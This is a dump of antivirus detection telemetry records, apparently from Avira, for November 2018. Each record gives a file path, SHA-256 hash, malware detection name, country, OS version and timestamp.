  Row(detection=Row(filename='avscan-20181102-060445-2b174d25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060445-2B174D25', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055008-204ba1c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055008-204BA1C3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053029-615ec3bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053029-615EC3BB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055616-fb4d539c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055616-FB4D539C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055057-3d3f439a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055057-3D3F439A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051051-a34ede37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051051-A34EDE37', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061950-465207d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061950-465207D7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061835-19c1d3c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061835-19C1D3C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062210-998746b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062210-998746B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050650-13a7d00a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050650-13A7D00A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053717-548a520a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053717-548A520A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055138-558cdfef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055138-558CDFEF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:22:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054802-d4c38d71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054802-D4C38D71', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062447-f77958fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062447-F77958FA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055721-2271fe6f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055721-2271FE6F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062126-7fa112de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062126-7FA112DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T09:31:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054323-2edd5b74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054323-2EDD5B74', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054810-d9a1d3ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054810-D9A1D3CA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T22:19:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-070754-49976123', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-070754-49976123', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='856be68c7c35950ec82cb025ae25eda6d534bd29b349cedcab036dfa22c3d18e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:09:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T00:09:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054420-50dd37b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054420-50DD37B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051208-d13ab02a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051208-D13AB02A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f_000918', filepath='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000918', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='79c96eaf2b23f7914f13b78c7c3b09faf3c1d5c9f602a0e3119b823b71f1bffb', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-02T19:13:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050648-12253369', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050648-12253369', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055807-3dbfcd42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055807-3DBFCD42', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061555-ba4759c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061555-BA4759C2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055816-4309aa8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055816-4309AA8B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061531-ac2e75aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061531-AC2E75AA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050830-4ef920b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050830-4EF920B0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-152023-1763f366', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151312-DB3E0F68\\AVSCAN-20181101-152023-1763F366', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:39:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155535-3dc05f88', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155535-3DC05F88', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:14:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh93a7.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH93A7.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:33:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-102040-3c25ca71', filepath='C:\\Dokumente und Einstellungen\\All Users\\Anwendungsdaten\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-095824-1F436122\\AVSCAN-20181101-102040-3C25CA71', filesize=512000, name='TR/Crypt.XPACK.136118.#M1.#R1'), hash='4bb00be774bac8316365d4205a29f36b4bad640a40682c7a7d4d770688ea654d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:20:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qc rpg.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\DATA MASTER LPA\\CINTIA LPA\\LPA\\DATA MASTER\\ASLI\\RPG\\QC RPG\\QC RPG.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jet40sp5_9xnt.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\aes731\\aspenonev7.3dvd1\\core\\mdac27sp1\\Jet40SP5_9xNT.exe', filesize=2752000, name='W32/Virut.Gen.#M1.#R1'), hash='3c62c512ced629a03d08b8bd48dfc67b23a6d2c7ac7aaf73e307c050806188bc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:38:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhface.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHFACE.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:43:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msinfo32.exe', filepath='C:\\Windows\\System32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='137e9f3a29c0dbea1e928b20a4ef1e562c63ff12ab657865479d9bc28171fdd1', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T12:21:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='(ace 3).exe', filepath='D:\\DATA_SHARE\\LPA\\GT-S7270 (ACE 3)\\(ACE 3).exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154610-5e7ffd55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154610-5E7FFD55', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155918-e310ca23', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155918-E310CA23', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bala4ev.scr', filepath='F:\\Bala4ev\\Bala4ev.scr', filesize=512000, name='TR/Drop.Agent.coc.#M1.#R1'), hash='2e396b3e8f08784c63f4097171584d19bb30490f16c6363556ae06a7443a26b8', metadata=Row(cmdline='\\\\\\"F:\\\\\\\\Bala4ev\\\\\\\\Bala4ev.scr\\\\\\"', country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\notepad.exe', parentsize=179712, timestamp='2018-11-01T16:51:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:13:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='46ad39ea3436e1a73207968f8d137f6078072924091b2ecd1ec328687b7e9de5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\46AD39EA3436E1A73207968F8D137F6078072924091B2ECD1EC328687B7E9DE5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='46ad39ea3436e1a73207968f8d137f6078072924091b2ecd1ec328687b7e9de5', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:24:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105755-3cb13b6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105548-25D20D21\\AVSCAN-20181101-105755-3CB13B6A', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:31:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bipartit 2015.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PROPOSAL LPA\\2015\\bipartit 2015\\bipartit 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2711753\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\nir-cmd-programas-gratis-net_2072453430.exe', parentsize=2308292, timestamp='2018-11-01T02:09:04Z'), dt=datetime.date(2018, 11, 1)),
